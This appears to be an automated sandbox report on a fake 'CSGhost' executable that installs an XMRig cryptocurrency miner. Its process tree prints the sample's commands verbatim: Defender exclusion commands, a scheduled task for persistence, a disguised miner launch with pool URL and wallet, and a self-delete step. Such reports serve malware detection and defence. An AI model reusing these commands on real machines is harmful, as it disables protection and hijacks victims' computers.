xmrig | d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-11-2024 16:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CSGhost-v4.1.exe
Size

158KB
MD5

2dd7cacaab277d37dace276fc3c98f32
SHA1

7227f97f9539a7620ef4ff6687394bce9220d972
SHA256

2340f7976585cd113520b33eb51c6b57e37c6bad2fba29a48b8c7e8e784a2491
SHA512

df73194f1adeff94942ff01e4161a836b642d02a5da564a0b8388936b1a1c7e0018779e49cfef38e8523c032d31bf34dc0fce7fad3185a57d5a20a616eb46520
SSDEEP

3072:mSKJbzx0eTzNRvcF9mOQEUzJw4xE+vn84Tt4dVmfyu5ytLNoH:pWztTz709mVEUzvydVk5ytLN

Score

10^/10

xmrig discovery execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral8/memory/4880-162-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-163-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-166-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-168-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-167-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-165-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-169-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-170-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-172-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-175-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/4880-173-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3352	powershell.exe
2608	powershell.exe
4964	powershell.exe
3700	powershell.exe
1484	powershell.exe
1964	powershell.exe
4636	powershell.exe
2980	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	svchost64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	svchost64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CSGhost-v4.1.exe

Executes dropped EXE 6 IoCs

pid	Process
5048	CSGhost-v4.1.exe
4992	svchost.exe
1844	svchost64.exe
3780	svchost.exe
4932	svchost64.exe
3304	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4932 set thread context of 4880	4932	svchost64.exe	131

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CSGhost-v4.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CSGhost-v4.1.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
808	schtasks.exe
1580	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
1964	powershell.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
1964	powershell.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe
5048	CSGhost-v4.1.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	1844	svchost64.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	4932	svchost64.exe
Token: SeLockMemoryPrivilege	4880	svchost.exe
Token: SeLockMemoryPrivilege	4880	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 5048	4444	CSGhost-v4.1.exe	85
PID 4444 wrote to memory of 5048	4444	CSGhost-v4.1.exe	85
PID 4444 wrote to memory of 5048	4444	CSGhost-v4.1.exe	85
PID 4444 wrote to memory of 4992	4444	CSGhost-v4.1.exe	86
PID 4444 wrote to memory of 4992	4444	CSGhost-v4.1.exe	86
PID 4992 wrote to memory of 3760	4992	svchost.exe	87
PID 4992 wrote to memory of 3760	4992	svchost.exe	87
PID 3760 wrote to memory of 1964	3760	cmd.exe	89
PID 3760 wrote to memory of 1964	3760	cmd.exe	89
PID 3760 wrote to memory of 4636	3760	cmd.exe	91
PID 3760 wrote to memory of 4636	3760	cmd.exe	91
PID 3760 wrote to memory of 2980	3760	cmd.exe	92
PID 3760 wrote to memory of 2980	3760	cmd.exe	92
PID 3760 wrote to memory of 3352	3760	cmd.exe	93
PID 3760 wrote to memory of 3352	3760	cmd.exe	93
PID 4992 wrote to memory of 2560	4992	svchost.exe	98
PID 4992 wrote to memory of 2560	4992	svchost.exe	98
PID 2560 wrote to memory of 1844	2560	cmd.exe	101
PID 2560 wrote to memory of 1844	2560	cmd.exe	101
PID 1844 wrote to memory of 4628	1844	svchost64.exe	102
PID 1844 wrote to memory of 4628	1844	svchost64.exe	102
PID 4628 wrote to memory of 808	4628	cmd.exe	104
PID 4628 wrote to memory of 808	4628	cmd.exe	104
PID 1844 wrote to memory of 3780	1844	svchost64.exe	107
PID 1844 wrote to memory of 3780	1844	svchost64.exe	107
PID 1844 wrote to memory of 3232	1844	svchost64.exe	108
PID 1844 wrote to memory of 3232	1844	svchost64.exe	108
PID 3780 wrote to memory of 4428	3780	svchost.exe	110
PID 3780 wrote to memory of 4428	3780	svchost.exe	110
PID 4428 wrote to memory of 2608	4428	cmd.exe	112
PID 4428 wrote to memory of 2608	4428	cmd.exe	112
PID 3232 wrote to memory of 4400	3232	cmd.exe	113
PID 3232 wrote to memory of 4400	3232	cmd.exe	113
PID 4428 wrote to memory of 4964	4428	cmd.exe	114
PID 4428 wrote to memory of 4964	4428	cmd.exe	114
PID 4428 wrote to memory of 3700	4428	cmd.exe	115
PID 4428 wrote to memory of 3700	4428	cmd.exe	115
PID 4428 wrote to memory of 1484	4428	cmd.exe	116
PID 4428 wrote to memory of 1484	4428	cmd.exe	116
PID 3780 wrote to memory of 3352	3780	svchost.exe	121
PID 3780 wrote to memory of 3352	3780	svchost.exe	121
PID 3352 wrote to memory of 4932	3352	cmd.exe	123
PID 3352 wrote to memory of 4932	3352	cmd.exe	123
PID 4932 wrote to memory of 1736	4932	svchost64.exe	124
PID 4932 wrote to memory of 1736	4932	svchost64.exe	124
PID 4932 wrote to memory of 3304	4932	svchost64.exe	126
PID 4932 wrote to memory of 3304	4932	svchost64.exe	126
PID 1736 wrote to memory of 1580	1736	cmd.exe	127
PID 1736 wrote to memory of 1580	1736	cmd.exe	127
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131
PID 4932 wrote to memory of 4880	4932	svchost64.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4444
- C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
  "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5048
- C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3352
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\svchost64.exe
      C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4628
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:808
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3780
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1736
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1580
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:3304
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14444 --user=448F1xWYd98Rsot8PEiA5FNbcX7h9ZNRcT6Kt41uAoUF4BrDE3Ph3YQ3ojownLCTrC4J1Bomr6LzrCTopwmq1fq33FrUvqJ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        8⤵
        
        PID:1048
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:5056
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3232
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:4400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

Filesize
646B

MD5
23867f73ff39fa0dfee6cfb5d3d176ab

SHA1
8705a09d38e5f0b034a6f4b4deb5817e312204e1

SHA256
f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

SHA512
108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e69c5554cfe965e000e33ee9f1cd88d5

SHA1
ef74e8e9a0113870c87ece51d4e86040b1eeecdc

SHA256
712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0

SHA512
6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cb0cf19ebeba3256a05065693a1ca866

SHA1
c028aff9b6850c2bdd6673b74037630b4ee2ccd8

SHA256
58e1183323526c135119df281171285d98b5ce05ad00f201ca899cd43358e3fb

SHA512
811606a0c8545eac53127a3687c6b0fde595dd7e958ef11ae650d142d40ac5e86ebbd313dc17dfa86c091ee868dc1c9ed422c2e541c6de3487e0c50c1a3e8fbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
83685d101174171875b4a603a6c2a35c

SHA1
37be24f7c4525e17fa18dbd004186be3a9209017

SHA256
0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

SHA512
005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

Filesize
99KB

MD5
56a7502c31f7e8b9df6026cca035d000

SHA1
a2e1dea33bec675650559a148f78f831a0c11886

SHA256
b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f

SHA512
82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

Filesize
47KB

MD5
164b5610097d3c76850d0d3cc1f3892a

SHA1
31c439c5dab3c0a98ca827a07e17f903b8aae2f9

SHA256
e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52

SHA512
fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1ub5fzm.2nw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Filesize
39KB

MD5
a5bdb33481f19152370a4cbe486c1790

SHA1
d657448275485590e0b141bc3965f03650636e47

SHA256
ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075

SHA512
61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
0dc0c432c76b5f23dec8f2da05da574f

SHA1
f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0

SHA256
9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee

SHA512
5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

Download Submit
memory/1844-79-0x0000000000AD0000-0x0000000000ADE000-memory.dmp

Filesize
56KB

Download
memory/1844-80-0x0000000001490000-0x00000000014A2000-memory.dmp

Filesize
72KB

Download
memory/1844-81-0x0000000001D00000-0x0000000001D0A000-memory.dmp

Filesize
40KB

Download
memory/1964-32-0x000001E37E590000-0x000001E37E5B2000-memory.dmp

Filesize
136KB

Download
memory/3304-160-0x0000000000500000-0x0000000000506000-memory.dmp

Filesize
24KB

Download
memory/4444-0-0x0000000074852000-0x0000000074853000-memory.dmp

Filesize
4KB

Download
memory/4444-26-0x0000000074850000-0x0000000074E01000-memory.dmp

Filesize
5.7MB

Download
memory/4444-2-0x0000000074850000-0x0000000074E01000-memory.dmp

Filesize
5.7MB

Download
memory/4444-1-0x0000000074850000-0x0000000074E01000-memory.dmp

Filesize
5.7MB

Download
memory/4880-167-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-170-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-162-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-163-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-164-0x0000013745870000-0x0000013745890000-memory.dmp

Filesize
128KB

Download
memory/4880-166-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-168-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-173-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-165-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-169-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4880-175-0x0000000140000000-0x0000000140786000-memory.dmp

